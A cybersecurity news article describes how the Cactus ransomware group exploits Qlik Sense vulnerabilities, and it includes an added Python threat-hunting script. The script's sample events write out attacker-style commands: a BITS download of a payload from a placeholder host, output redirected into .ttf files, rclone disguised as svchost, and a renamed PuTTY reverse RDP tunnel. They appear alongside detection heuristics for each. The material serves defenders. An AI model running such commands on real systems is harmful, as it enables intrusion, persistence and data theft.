Cactus ransomware, compromising networks through Qlik Sense – CyberTalk
EXECUTIVE SUMMARY:
The Cactus cyber criminal group is currently exploiting three different security flaws within the Qlik Sense platform, a versatile cloud analytics engine, in order to execute ransomware attacks.
In the past, Cactus criminals have targeted prominent global commercial organizations, embarrassing victims by publishing their names and brief corresponding descriptions on a dark web leak channel.
To avoid the Qlik Sense threat, understand the Cactus group’s tactics, techniques and procedures (TTPs). Keep reading to learn more:
Critical vulnerabilities
In August, Qlik Sense released security updates pertaining to two critical vulnerabilities that affected the Windows version of the platform. One such vulnerability, tracked as CVE-2023-41266, could be used to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.
The second vulnerability, tracked as CVE-2023-41265, with a critical CVSS score of 9.8, can be leveraged for privilege elevation and to execute HTTP requests on the backend server hosting the application. This bug doesn’t require authorization of any kind in order for hackers to exploit it.
In September, Qlik Sense found that the fix for CVE-2023-41265 was incomplete and developers provided a new update. Afterwards, tracking for the issue resumed under a different CVE.
According to a recent cyber security research report, the ransomware group known as Cactus is actively exploiting the aforementioned flaws on publicly-exposed Qlik Sense instances that remain unpatched.
Breach methodology explained
These Cactus ransomware attacks prey on Qlik Sense’s security vulnerabilities and execute code that triggers the Qlik Sense Scheduler service to initiate new processes.
The cyber criminals employ PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and enable remote access to the machine:
- ManageEngine UEMS executables posing as Qlik files
- AnyDesk obtained directly from the official website
- A Plink (PuTTY Link) binary renamed to “putty.exe”
In addition, Cactus executes multiple discovery commands and redirects their output into .TTF files, which researchers believe is a way of retrieving the command output via path traversal.
To remain hidden and to gather information, Cactus changes the administrator password, establishes an RDP tunnel using the Plink command-line connection tool, and more.
In the final stage of the attack, the threat actors deploy the Cactus ransomware on the compromised system (highlighting the importance of securing Qlik Sense against sophisticated threats).
Additional attack information
Emerging evidence points to hackers skillfully employing RDP for discreet lateral movements. WizTree serves as a disk space analysis tool, while rclone, cleverly disguised as ‘svchost.exe,’ facilitates the covert exfiltration of data. The tools and techniques align with the patterns observed in previous Cactus ransomware attacks, as described by researchers.
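The breach methodology and additional attack information above describe several host-level behaviours a defender can hunt for: the Qlik Sense Scheduler service spawning a shell, command output redirected into .TTF files, BITS used as a downloader, rclone running under the name svchost.exe from a non-system path, and a renamed Plink carrying RDP over a reverse tunnel. The following is an added example (not from the article or from any vendor) that turns those observations into simple process-creation heuristics; the event field names, the sample events and the parent image name `Scheduler.exe` for the Qlik Sense Scheduler are constructed assumptions, so map them to your own telemetry before use.

```python
import re

# Constructed sample process-creation events (not real telemetry). Field names
# and the Scheduler.exe parent name are assumptions; <placeholder> marks hosts.
SAMPLE_EVENTS = [
    {"parent": "Scheduler.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c whoami /all > C:\ProgramData\Qlik\fonts\q1.ttf"},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -c Start-BitsTransfer -Source http://<placeholder>/uems.exe "
            r"-Destination C:\ProgramData\Qlik\qlik.exe"},
    {"parent": "explorer.exe", "image": r"C:\ProgramData\svchost.exe",
     "cmd": r"svchost.exe copy C:\Share remote:bucket"},
    {"parent": "cmd.exe", "image": r"C:\Users\Public\putty.exe",
     "cmd": "putty.exe -R 3389:127.0.0.1:3389 -P 443 user@<placeholder>"},
    {"parent": "services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmd": "svchost.exe -k netsvcs"},  # benign control case
]

# Directories from which a genuine svchost.exe is expected to run.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def classify(ev):
    """Return the names of every heuristic the event triggers (possibly none)."""
    hits = []
    image = ev["image"].lower()
    name = image.rsplit("\\", 1)[-1]
    cmd = ev["cmd"].lower()
    # 1. Scheduler service launching a shell: the article's initial-execution step.
    if ev["parent"].lower() == "scheduler.exe" and name in ("cmd.exe", "powershell.exe"):
        hits.append("scheduler_spawned_shell")
    # 2. Command output redirected into a .ttf file.
    if re.search(r">\s*\S+\.ttf\b", cmd):
        hits.append("output_to_ttf")
    # 3. BITS used to fetch tooling.
    if "start-bitstransfer" in cmd or ("bitsadmin" in cmd and "/transfer" in cmd):
        hits.append("bits_download")
    # 4. svchost.exe executing outside the system directories (rclone masquerade).
    if name == "svchost.exe" and not image.startswith(SYSTEM_DIRS):
        hits.append("svchost_masquerade")
    # 5. putty.exe opening a reverse tunnel that carries RDP (renamed Plink).
    if name == "putty.exe" and "-r" in cmd.split() and "3389" in cmd:
        hits.append("rdp_tunnel_via_putty")
    return hits


def scan(events):
    """Map event index -> triggered heuristics, omitting clean events."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}
```

Each rule is a coarse indicator on its own; the value for triage is an event that trips several of them, or a host that trips different rules in sequence.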
Cactus ransomware group insights
The Cactus ransomware group made its debut in March of this year, immediately deploying the double-extortion ransomware tactic. This approach involves both stealing the victims’ data and encrypting it on compromised systems.
Researchers have underscored the significance of this ransomware operation due to its use of encryption to shield the malware binary from detection via security products.
This general vulnerability disclosure comes as the ransomware landscape becomes more sophisticated and as the ransomware economy has begun to scale.
To better protect your business, check out this CISO’s Guide to Ransomware prevention. Plus, explore advanced anti-ransomware technologies here. Lastly, to receive timely cyber security insights, exclusive interviews, and cutting-edge analyses, please sign up for the cybertalk.org newsletter.